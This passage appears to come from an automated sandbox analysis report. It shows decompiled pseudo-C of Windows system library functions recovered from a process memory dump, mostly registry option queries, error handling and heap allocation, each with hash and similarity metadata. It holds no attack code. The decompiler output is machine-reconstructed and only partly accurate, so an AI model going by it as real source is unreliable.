                                                              					return E04BDB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                                                              				}
                                                              				_t79 =  &_v352;
                                                              				_t81 = E04C13971(0, _a4,  &_v352,  &_v1156);
                                                              				if(_t81 < 0) {
                                                              					goto L11;
                                                              				}
                                                              				_t75 = _v1156;
                                                              				_t79 =  &_v1160;
                                                              				_t81 = E04C13884(_v1156,  &_v1160,  &_v1168);
                                                              				if(_t81 >= 0) {
                                                              					_t80 = _v1160;
                                                              					E04BDFA60( &_v96, 0, 0x50);
                                                              					_t83 = _t83 + 0xc;
                                                              					_push( &_v1180);
                                                              					_push(0x50);
                                                              					_push( &_v96);
                                                              					_push(2);
                                                              					_push( &_v1176);
                                                              					_push(_v1156);
                                                              					_t81 = E04BD9650();
                                                              					if(_t81 >= 0) {
                                                              						if(_v92 != 3 || _v88 == 0) {
                                                              							_t81 = 0xc000090b;
                                                              						}
                                                              						if(_t81 >= 0) {
                                                              							_t75 = _a4;
                                                              							_t79 =  &_v352;
                                                              							E04C13787(_a4,  &_v352, _t80);
                                                              						}
                                                              					}
                                                              					L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                                                              				}
                                                              				_push(_v1156);
                                                              				E04BD95D0();
                                                              				if(_t81 >= 0) {
                                                              					goto L12;
                                                              				} else {
                                                              					goto L11;
                                                              				}
                                                              			}
































                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: BinaryHash
                                                              • API String ID: 2994545307-2202222882
                                                              • Opcode ID: e6ceae0d6b01157f60daa2852426cfe7c52b245ffb9417fd7e348dbcc04617b5
                                                              • Instruction ID: e80924bbeca7c2fd738c3eca5065b4ea6dd9ec86c09ae4f4520a43b79247c48b
                                                              • Opcode Fuzzy Hash: e6ceae0d6b01157f60daa2852426cfe7c52b245ffb9417fd7e348dbcc04617b5
                                                              • Instruction Fuzzy Hash: 5C4146F1D0056C9BEB21DA50CC84FEEB77DAB4571CF0045E5EA09A7250EB30AE899F94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 72%
                                                              			E04C13884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                                              				char _v8;
                                                              				intOrPtr _v12;
                                                              				intOrPtr* _v16;
                                                              				char* _v20;
                                                              				short _v22;
                                                              				char _v24;
                                                              				intOrPtr _t38;
                                                              				short _t40;
                                                              				short _t41;
                                                              				void* _t44;
                                                              				intOrPtr _t47;
                                                              				void* _t48;
                                                              
                                                              				_v16 = __edx;
                                                              				_t40 = 0x14;
                                                              				_v24 = _t40;
                                                              				_t41 = 0x16;
                                                              				_v22 = _t41;
                                                              				_t38 = 0;
                                                              				_v12 = __ecx;
                                                              				_push( &_v8);
                                                              				_push(0);
                                                              				_push(0);
                                                              				_push(2);
                                                              				_t43 =  &_v24;
                                                              				_v20 = L"BinaryName";
                                                              				_push( &_v24);
                                                              				_push(__ecx);
                                                              				_t47 = 0;
                                                              				_t48 = E04BD9650();
                                                              				if(_t48 >= 0) {
                                                              					_t48 = 0xc000090b;
                                                              				}
                                                              				if(_t48 != 0xc0000023) {
                                                              					_t44 = 0;
                                                              					L13:
                                                              					if(_t48 < 0) {
                                                              						L16:
                                                              						if(_t47 != 0) {
                                                              							L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                                                              						}
                                                              						L18:
                                                              						return _t48;
                                                              					}
                                                              					 *_v16 = _t38;
                                                              					 *_a4 = _t47;
                                                              					goto L18;
                                                              				}
                                                              				_t47 = L04BB4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                                              				if(_t47 != 0) {
                                                              					_push( &_v8);
                                                              					_push(_v8);
                                                              					_push(_t47);
                                                              					_push(2);
                                                              					_push( &_v24);
                                                              					_push(_v12);
                                                              					_t48 = E04BD9650();
                                                              					if(_t48 < 0) {
                                                              						_t44 = 0;
                                                              						goto L16;
                                                              					}
                                                              					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                                                              						_t48 = 0xc000090b;
                                                              					}
                                                              					_t44 = 0;
                                                              					if(_t48 < 0) {
                                                              						goto L16;
                                                              					} else {
                                                              						_t17 = _t47 + 0xc; // 0xc
                                                              						_t38 = _t17;
                                                              						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                                                              							_t48 = 0xc000090b;
                                                              						}
                                                              						goto L13;
                                                              					}
                                                              				}
                                                              				_t48 = _t48 + 0xfffffff4;
                                                              				goto L18;
                                                              			}
















                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: BinaryName
                                                              • API String ID: 2994545307-215506332
                                                              • Opcode ID: 8f236be9982b55618a31c62b1ce8ac0aea433c305ff3241373ff796a647d4f33
                                                              • Instruction ID: a9a220ca862950ac7871b6b295061664c04def71f9abca76e5ee0902ad3d4a41
                                                              • Opcode Fuzzy Hash: 8f236be9982b55618a31c62b1ce8ac0aea433c305ff3241373ff796a647d4f33
                                                              • Instruction Fuzzy Hash: 5231F472A00549AFFB25DA59C945D7BB775EB82728F0141A9AC14A7670D630BE00D7E0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 33%
                                                              			E04BCD294(void* __ecx, char __edx, void* __eflags) {
                                                              				signed int _v8;
                                                              				char _v52;
                                                              				signed int _v56;
                                                              				signed int _v60;
                                                              				intOrPtr _v64;
                                                              				char* _v68;
                                                              				intOrPtr _v72;
                                                              				char _v76;
                                                              				signed int _v84;
                                                              				intOrPtr _v88;
                                                              				char _v92;
                                                              				intOrPtr _v96;
                                                              				intOrPtr _v100;
                                                              				char _v104;
                                                              				char _v105;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int _t35;
                                                              				char _t38;
                                                              				signed int _t40;
                                                              				signed int _t44;
                                                              				signed int _t52;
                                                              				void* _t53;
                                                              				void* _t55;
                                                              				void* _t61;
                                                              				intOrPtr _t62;
                                                              				void* _t64;
                                                              				signed int _t65;
                                                              				signed int _t66;
                                                              
                                                              				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                                                              				_v8 =  *0x4c8d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                                                              				_v105 = __edx;
                                                              				_push( &_v92);
                                                              				_t52 = 0;
                                                              				_push(0);
                                                              				_push(0);
                                                              				_push( &_v104);
                                                              				_push(0);
                                                              				_t59 = __ecx;
                                                              				_t55 = 2;
                                                              				if(E04BB4120(_t55, __ecx) < 0) {
                                                              					_t35 = 0;
                                                              					L8:
                                                              					_pop(_t61);
                                                              					_pop(_t64);
                                                              					_pop(_t53);
                                                              					return E04BDB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                                                              				}
                                                              				_v96 = _v100;
                                                              				_t38 = _v92;
                                                              				if(_t38 != 0) {
                                                              					_v104 = _t38;
                                                              					_v100 = _v88;
                                                              					_t40 = _v84;
                                                              				} else {
                                                              					_t40 = 0;
                                                              				}
                                                              				_v72 = _t40;
                                                              				_v68 =  &_v104;
                                                              				_push( &_v52);
                                                              				_v76 = 0x18;
                                                              				_push( &_v76);
                                                              				_v64 = 0x40;
                                                              				_v60 = _t52;
                                                              				_v56 = _t52;
                                                              				_t44 = E04BD98D0();
                                                              				_t62 = _v88;
                                                              				_t65 = _t44;
                                                              				if(_t62 != 0) {
                                                              					asm("lock xadd [edi], eax");
                                                              					if((_t44 | 0xffffffff) != 0) {
                                                              						goto L4;
                                                              					}
                                                              					_push( *((intOrPtr*)(_t62 + 4)));
                                                              					E04BD95D0();
                                                              					L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                                                              					goto L4;
                                                              				} else {
                                                              					L4:
                                                              					L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                                                              					if(_t65 >= 0) {
                                                              						_t52 = 1;
                                                              					} else {
                                                              						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                                                              							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                                                              						}
                                                              					}
                                                              					_t35 = _t52;
                                                              					goto L8;
                                                              				}
                                                              			}


































                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @
                                                              • API String ID: 0-2766056989
                                                              • Opcode ID: cc2d1fec11d1c847542b00b292cf2cfb50179c9a0ed9ef06043924fde571b4bf
                                                              • Instruction ID: abc6e732f16ae2257e7d8c726b30544cca456df37f8c629e9743985021d87466
                                                              • Opcode Fuzzy Hash: cc2d1fec11d1c847542b00b292cf2cfb50179c9a0ed9ef06043924fde571b4bf
                                                              • Instruction Fuzzy Hash: 453170B56083459FD711DF28C98096BBBECEBC5654F0009BEF99583250E639ED04DBE2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 72%
                                                              			E04BA1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                                                              				intOrPtr _v8;
                                                              				char _v16;
                                                              				intOrPtr* _t26;
                                                              				intOrPtr _t29;
                                                              				void* _t30;
                                                              				signed int _t31;
                                                              
                                                              				_t27 = __ecx;
                                                              				_t29 = __edx;
                                                              				_t31 = 0;
                                                              				_v8 = __edx;
                                                              				if(__edx == 0) {
                                                              					L18:
                                                              					_t30 = 0xc000000d;
                                                              					goto L12;
                                                              				} else {
                                                              					_t26 = _a4;
                                                              					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                                                              						goto L18;
                                                              					} else {
                                                              						E04BDBB40(__ecx,  &_v16, __ecx);
                                                              						_push(_t26);
                                                              						_push(0);
                                                              						_push(0);
                                                              						_push(_t29);
                                                              						_push( &_v16);
                                                              						_t30 = E04BDA9B0();
                                                              						if(_t30 >= 0) {
                                                              							_t19 =  *_t26;
                                                              							if( *_t26 != 0) {
                                                              								goto L7;
                                                              							} else {
                                                              								 *_a8 =  *_a8 & 0;
                                                              							}
                                                              						} else {
                                                              							if(_t30 != 0xc0000023) {
                                                              								L9:
                                                              								_push(_t26);
                                                              								_push( *_t26);
                                                              								_push(_t31);
                                                              								_push(_v8);
                                                              								_push( &_v16);
                                                              								_t30 = E04BDA9B0();
                                                              								if(_t30 < 0) {
                                                              									L12:
                                                              									if(_t31 != 0) {
                                                              										L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                                                              									}
                                                              								} else {
                                                              									 *_a8 = _t31;
                                                              								}
                                                              							} else {
                                                              								_t19 =  *_t26;
                                                              								if( *_t26 == 0) {
                                                              									_t31 = 0;
                                                              								} else {
                                                              									L7:
                                                              									_t31 = L04BB4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                                                              								}
                                                              								if(_t31 == 0) {
                                                              									_t30 = 0xc0000017;
                                                              								} else {
                                                              									goto L9;
                                                              								}
                                                              							}
                                                              						}
                                                              					}
                                                              				}
                                                              				return _t30;
                                                              			}










                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID: WindowsExcludedProcs
                                                              • API String ID: 0-3583428290
                                                              • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                              • Instruction ID: e6b894ff0df3b444bea0abe51534ccc7793927d210214283d9e5b14d5d348160
                                                              • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                              • Instruction Fuzzy Hash: 1621F536604228ABDB619EADC840FABB7ADEF40B50F0544E5FD048F200FA30FD1497A0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 71%
                                                              			E04C48DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                              				intOrPtr _t35;
                                                              				void* _t41;
                                                              
                                                              				_t40 = __esi;
                                                              				_t39 = __edi;
                                                              				_t38 = __edx;
                                                              				_t35 = __ecx;
                                                              				_t34 = __ebx;
                                                              				_push(0x74);
                                                              				_push(0x4c70d50);
                                                              				E04BED0E8(__ebx, __edi, __esi);
                                                              				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                                                              				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                                                              				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                                                              					E04C25720(0x65, 0, "Critical error detected %lx\n", _t35);
                                                              					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                                                              						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                                              						asm("int3");
                                                              						 *(_t41 - 4) = 0xfffffffe;
                                                              					}
                                                              				}
                                                              				 *(_t41 - 4) = 1;
                                                              				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                                                              				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                                                              				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                                                              				 *((intOrPtr*)(_t41 - 0x64)) = L04BEDEF0;
                                                              				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                                                              				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                                                              				_push(_t41 - 0x70);
                                                              				L04BEDEF0(1, _t38);
                                                              				 *(_t41 - 4) = 0xfffffffe;
                                                              				return E04BED130(_t34, _t39, _t40);
                                                              			}






                                                              Strings
                                                              • Critical error detected %lx, xrefs: 04C48E21
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Critical error detected %lx
                                                              • API String ID: 0-802127002
                                                              • Opcode ID: b5146bdefa673a3ffceda06db38b8e6c4bca25afea98616d9c2847345c55e2a7
                                                              • Instruction ID: 1bd7bfacf5c452dc8e9a7ed6e4e993b7f60dc15b93bcf062a74ccf7ebb49363f
                                                              • Opcode Fuzzy Hash: b5146bdefa673a3ffceda06db38b8e6c4bca25afea98616d9c2847345c55e2a7
                                                              • Instruction Fuzzy Hash: 1F11ED79D00308EBEF24EFA586057ECBBB5BB44714F24425ED028AB282C3706602CF24
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 04C2FF60
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                              • API String ID: 0-1911121157
                                                              • Opcode ID: b082c4e3de637bb753e529c0d5c4a75f8e9336fc94820bbf2794e29a914fc823
                                                              • Instruction ID: 5de126c92b617e41611e955fd36ecfb3a9135f4320f9b37c5ac9d45678fe53f2
                                                              • Opcode Fuzzy Hash: b082c4e3de637bb753e529c0d5c4a75f8e9336fc94820bbf2794e29a914fc823
                                                              • Instruction Fuzzy Hash: 6311C475550158EFEB12EF50CA48FA877F2FF48709F148098F5045B1A1C7B9BA40EB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 88%
                                                              			E04C65BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                                                              				signed int _t296;
                                                              				signed char _t298;
                                                              				signed int _t301;
                                                              				signed int _t306;
                                                              				signed int _t310;
                                                              				signed char _t311;
                                                              				intOrPtr _t312;
                                                              				signed int _t313;
                                                              				void* _t327;
                                                              				signed int _t328;
                                                              				intOrPtr _t329;
                                                              				intOrPtr _t333;
                                                              				signed char _t334;
                                                              				signed int _t336;
                                                              				void* _t339;
                                                              				signed int _t340;
                                                              				signed int _t356;
                                                              				signed int _t362;
                                                              				short _t367;
                                                              				short _t368;
                                                              				short _t373;
                                                              				signed int _t380;
                                                              				void* _t382;
                                                              				short _t385;
                                                              				signed short _t392;
                                                              				signed char _t393;
                                                              				signed int _t395;
                                                              				signed char _t397;
                                                              				signed int _t398;
                                                              				signed short _t402;
                                                              				void* _t406;
                                                              				signed int _t412;
                                                              				signed char _t414;
                                                              				signed short _t416;
                                                              				signed int _t421;
                                                              				signed char _t427;
                                                              				intOrPtr _t434;
                                                              				signed char _t435;
                                                              				signed int _t436;
                                                              				signed int _t442;
                                                              				signed int _t446;
                                                              				signed int _t447;
                                                              				signed int _t451;
                                                              				signed int _t453;
                                                              				signed int _t454;
                                                              				signed int _t455;
                                                              				intOrPtr _t456;
                                                              				intOrPtr* _t457;
                                                              				short _t458;
                                                              				signed short _t462;
                                                              				signed int _t469;
                                                              				intOrPtr* _t474;
                                                              				signed int _t475;
                                                              				signed int _t479;
                                                              				signed int _t480;
                                                              				signed int _t481;
                                                              				short _t485;
                                                              				signed int _t491;
                                                              				signed int* _t494;
                                                              				signed int _t498;
                                                              				signed int _t505;
                                                              				intOrPtr _t506;
                                                              				signed short _t508;
                                                              				signed int _t511;
                                                              				void* _t517;
                                                              				signed int _t519;
                                                              				signed int _t522;
                                                              				void* _t523;
                                                              				signed int _t524;
                                                              				void* _t528;
                                                              				signed int _t529;
                                                              
                                                              				_push(0xd4);
                                                              				_push(0x4c71178);
                                                              				E04BED0E8(__ebx, __edi, __esi);
                                                              				_t494 = __edx;
                                                              				 *(_t528 - 0xcc) = __edx;
                                                              				_t511 = __ecx;
                                                              				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                                                              				 *(_t528 - 0xbc) = __ecx;
                                                              				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                                                              				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                                                              				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                                                              				_t427 = 0;
                                                              				 *(_t528 - 0x74) = 0;
                                                              				 *(_t528 - 0x9c) = 0;
                                                              				 *(_t528 - 0x84) = 0;
                                                              				 *(_t528 - 0xac) = 0;
                                                              				 *(_t528 - 0x88) = 0;
                                                              				 *(_t528 - 0xa8) = 0;
                                                              				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                                                              				if( *(_t528 + 0x1c) <= 0x80) {
                                                              					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                                                              					if(__eflags != 0) {
                                                              						_t421 = E04C64C56(0, __edx, __ecx, __eflags);
                                                              						__eflags = _t421;
                                                              						if(_t421 != 0) {
                                                              							 *((intOrPtr*)(_t528 - 4)) = 0;
                                                              							E04BDD000(0x410);
                                                              							 *(_t528 - 0x18) = _t529;
                                                              							 *(_t528 - 0x9c) = _t529;
                                                              							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                                                              							E04C65542(_t528 - 0x9c, _t528 - 0x84);
                                                              						}
                                                              					}
                                                              					_t435 = _t427;
                                                              					 *(_t528 - 0xd0) = _t435;
                                                              					_t474 = _t511 + 0x65;
                                                              					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                                              					_t511 = 0x18;
                                                              					while(1) {
                                                              						 *(_t528 - 0xa0) = _t427;
                                                              						 *(_t528 - 0xbc) = _t427;
                                                              						 *(_t528 - 0x80) = _t427;
                                                              						 *(_t528 - 0x78) = 0x50;
                                                              						 *(_t528 - 0x79) = _t427;
                                                              						 *(_t528 - 0x7a) = _t427;
                                                              						 *(_t528 - 0x8c) = _t427;
                                                              						 *(_t528 - 0x98) = _t427;
                                                              						 *(_t528 - 0x90) = _t427;
                                                              						 *(_t528 - 0xb0) = _t427;
                                                              						 *(_t528 - 0xb8) = _t427;
                                                              						_t296 = 1 << _t435;
                                                              						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                                                              						__eflags = _t436 & _t296;
                                                              						if((_t436 & _t296) != 0) {
                                                              							goto L92;
                                                              						}
                                                              						__eflags =  *((char*)(_t474 - 1));
                                                              						if( *((char*)(_t474 - 1)) == 0) {
                                                              							goto L92;
                                                              						}
                                                              						_t301 =  *_t474;
                                                              						__eflags = _t494[1] - _t301;
                                                              						if(_t494[1] <= _t301) {
                                                              							L10:
                                                              							__eflags =  *(_t474 - 5) & 0x00000040;
                                                              							if(( *(_t474 - 5) & 0x00000040) == 0) {
                                                              								L12:
                                                              								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                                                              								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                                                              									goto L92;
                                                              								}
                                                              								_t442 =  *(_t474 - 0x11) & _t494[3];
                                                              								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                                                              								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                                                              									goto L92;
                                                              								}
                                                              								__eflags = _t442 -  *(_t474 - 0x11);
                                                              								if(_t442 !=  *(_t474 - 0x11)) {
                                                              									goto L92;
                                                              								}
                                                              								L15:
                                                              								_t306 =  *(_t474 + 1) & 0x000000ff;
                                                              								 *(_t528 - 0xc0) = _t306;
                                                              								 *(_t528 - 0xa4) = _t306;
                                                              								__eflags =  *0x4c860e8;
                                                              								if( *0x4c860e8 != 0) {
                                                              									__eflags = _t306 - 0x40;
                                                              									if(_t306 < 0x40) {
                                                              										L20:
                                                              										asm("lock inc dword [eax]");
                                                              										_t310 =  *0x4c860e8; // 0x0
                                                              										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                                                              										__eflags = _t311 & 0x00000001;
                                                              										if((_t311 & 0x00000001) == 0) {
                                                              											 *(_t528 - 0xa0) = _t311;
                                                              											_t475 = _t427;
                                                              											 *(_t528 - 0x74) = _t427;
                                                              											__eflags = _t475;
                                                              											if(_t475 != 0) {
                                                              												L91:
                                                              												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                                              												goto L92;
                                                              											}
                                                              											asm("sbb edi, edi");
                                                              											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                                                              											_t511 = _t498;
                                                              											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                                                              											__eflags =  *(_t312 - 5) & 1;
                                                              											if(( *(_t312 - 5) & 1) != 0) {
                                                              												_push(_t528 - 0x98);
                                                              												_push(0x4c);
                                                              												_push(_t528 - 0x70);
                                                              												_push(1);
                                                              												_push(0xfffffffa);
                                                              												_t412 = E04BD9710();
                                                              												_t475 = _t427;
                                                              												__eflags = _t412;
                                                              												if(_t412 >= 0) {
                                                              													_t414 =  *(_t528 - 0x98) - 8;
                                                              													 *(_t528 - 0x98) = _t414;
                                                              													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                                                              													 *(_t528 - 0x8c) = _t416;
                                                              													 *(_t528 - 0x79) = 1;
                                                              													_t511 = (_t416 & 0x0000ffff) + _t498;
                                                              													__eflags = _t511;
                                                              												}
                                                              											}
                                                              											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                                                              											__eflags = _t446 & 0x00000004;
                                                              											if((_t446 & 0x00000004) != 0) {
                                                              												__eflags =  *(_t528 - 0x9c);
                                                              												if( *(_t528 - 0x9c) != 0) {
                                                              													 *(_t528 - 0x7a) = 1;
                                                              													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                                                              													__eflags = _t511;
                                                              												}
                                                              											}
                                                              											_t313 = 2;
                                                              											_t447 = _t446 & _t313;
                                                              											__eflags = _t447;
                                                              											 *(_t528 - 0xd4) = _t447;
                                                              											if(_t447 != 0) {
                                                              												_t406 = 0x10;
                                                              												_t511 = _t511 + _t406;
                                                              												__eflags = _t511;
                                                              											}
                                                              											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                                                              											 *(_t528 - 0x88) = _t427;
                                                              											__eflags =  *(_t528 + 0x1c);
                                                              											if( *(_t528 + 0x1c) <= 0) {
                                                              												L45:
                                                              												__eflags =  *(_t528 - 0xb0);
                                                              												if( *(_t528 - 0xb0) != 0) {
                                                              													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                                              													__eflags = _t511;
                                                              												}
                                                              												__eflags = _t475;
                                                              												if(_t475 != 0) {
                                                              													asm("lock dec dword [ecx+edx*8+0x4]");
                                                              													goto L100;
                                                              												} else {
                                                              													_t494[3] = _t511;
                                                              													_t451 =  *(_t528 - 0xa0);
                                                              													_t427 = E04BD6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                                                              													 *(_t528 - 0x88) = _t427;
                                                              													__eflags = _t427;
                                                              													if(_t427 == 0) {
                                                              														__eflags = _t511 - 0xfff8;
                                                              														if(_t511 <= 0xfff8) {
                                                              															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                                                              															asm("sbb ecx, ecx");
                                                              															__eflags = (_t451 & 0x000000e2) + 8;
                                                              														}
                                                              														asm("lock dec dword [eax+edx*8+0x4]");
                                                              														L100:
                                                              														goto L101;
                                                              													}
                                                              													_t453 =  *(_t528 - 0xa0);
                                                              													 *_t494 = _t453;
                                                              													_t494[1] = _t427;
                                                              													_t494[2] =  *(_t528 - 0xbc);
                                                              													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                                                              													 *_t427 =  *(_t453 + 0x24) | _t511;
                                                              													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                                                              													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                                                              													asm("movsd");
                                                              													asm("movsd");
                                                              													asm("movsd");
                                                              													asm("movsd");
                                                              													asm("movsd");
                                                              													asm("movsd");
                                                              													asm("movsd");
                                                              													asm("movsd");
                                                              													__eflags =  *(_t528 + 0x14);
                                                              													if( *(_t528 + 0x14) == 0) {
                                                              														__eflags =  *[fs:0x18] + 0xf50;
                                                              													}
                                                              													asm("movsd");
                                                              													asm("movsd");
                                                              													asm("movsd");
                                                              													asm("movsd");
                                                              													__eflags =  *(_t528 + 0x18);
                                                              													if( *(_t528 + 0x18) == 0) {
                                                              														_t454 =  *(_t528 - 0x80);
                                                              														_t479 =  *(_t528 - 0x78);
                                                              														_t327 = 1;
                                                              														__eflags = 1;
                                                              													} else {
                                                              														_t146 = _t427 + 0x50; // 0x50
                                                              														_t454 = _t146;
                                                              														 *(_t528 - 0x80) = _t454;
                                                              														_t382 = 0x18;
                                                              														 *_t454 = _t382;
                                                              														 *((short*)(_t454 + 2)) = 1;
                                                              														_t385 = 0x10;
                                                              														 *((short*)(_t454 + 6)) = _t385;
                                                              														 *(_t454 + 4) = 0;
                                                              														asm("movsd");
                                                              														asm("movsd");
                                                              														asm("movsd");
                                                              														asm("movsd");
                                                              														_t327 = 1;
                                                              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                              														_t479 = 0x68;
                                                              														 *(_t528 - 0x78) = _t479;
                                                              													}
                                                              													__eflags =  *(_t528 - 0x79) - _t327;
                                                              													if( *(_t528 - 0x79) == _t327) {
                                                              														_t524 = _t479 + _t427;
                                                              														_t508 =  *(_t528 - 0x8c);
                                                              														 *_t524 = _t508;
                                                              														_t373 = 2;
                                                              														 *((short*)(_t524 + 2)) = _t373;
                                                              														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                                                              														 *((short*)(_t524 + 4)) = 0;
                                                              														_t167 = _t524 + 8; // 0x8
                                                              														E04BDF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                                                              														_t529 = _t529 + 0xc;
                                                              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                              														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                                                              														 *(_t528 - 0x78) = _t479;
                                                              														_t380 =  *(_t528 - 0x80);
